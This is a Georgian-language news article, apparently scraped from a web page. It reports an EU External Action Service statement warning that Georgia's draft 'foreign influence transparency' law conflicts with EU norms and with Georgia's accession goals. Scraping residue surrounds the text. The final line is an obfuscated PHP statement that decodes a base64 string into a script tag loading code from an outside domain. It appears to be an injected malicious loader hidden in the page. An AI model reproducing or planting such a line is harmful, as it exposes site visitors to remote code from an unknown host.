celsiusi
ავერსი შნაიდერი
ევროკავშირის საგარეო ქმედებათა სამსახური „უცხოური გავლენის გამჭვირვალობის შესახებ“ მოძრაობა „ხალხის ძალის“ კანონპროექტთან დაკავშირებით განცხადებას ავრცელებს.
როგორც განცხადებაშია აღნიშნული, ამ კანონპროექტის დამტკიცება შეუსაბამო იქნება საქართველოს მისწრაფებებთან, ასევე ევროკავშირის ნორმებთან და ღირებულებებთან.
„უცხოური გავლენის გამჭვირვალობის” შესახებ ინიცირებული კანონპროექტი სერიოზულ შეშფოთებას იწვევს. სამოქალაქო საზოგადოების ორგანიზაციებისთვის ხელსაყრელი გარემოს შექმნა, შენარჩუნება და მედიის თავისუფლების უზრუნველყოფა არის დემოკრატიის საფუძველი. ეს ასევე არის საკვანძო ევროკავშირის გაწევრიანების პროცესისთვის და წარმოადგენს 12 პრიორიტეტის ნაწილს, კერძოდ, მეშვიდე პუნქტს მედიის თავისუფლების შესახებ და მეათე პუნქტს სამოქალაქო საზოგადოების ჩართულობის შესახებ.
ევროკავშირი მხარს უჭერს საქართველოს რეფორმების ძალისხმევას, რომელიც პასუხობს ქვეყნის მისწრაფებებს განვითარებისკენ და ევროკავშირის წევრობისკენ, როგორც ეს საქართველოს კონსტიტუციაშია გაწერილი.
კანონპროექტის მიღება შეუსაბამო იქნებოდა ამ მისწრაფებებთან, ევროკავშირის ნორმებთან და ღირებულებებთან.
ჩვენ მოვუწოდებთ საქართველოში პოლიტიკურ ლიდერებს, დაამტკიცონ და შეასრულონ რეფორმები, რომლებიც შეესაბამება ევროკავშირში გაწევრიანების გაცხადებულ მიზანთან, რომელსაც მხარს უჭერს საქართველოს მოსახლეობის დიდი უმრავლესობა”, – ნათქვამია განცხადებაში.
319
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");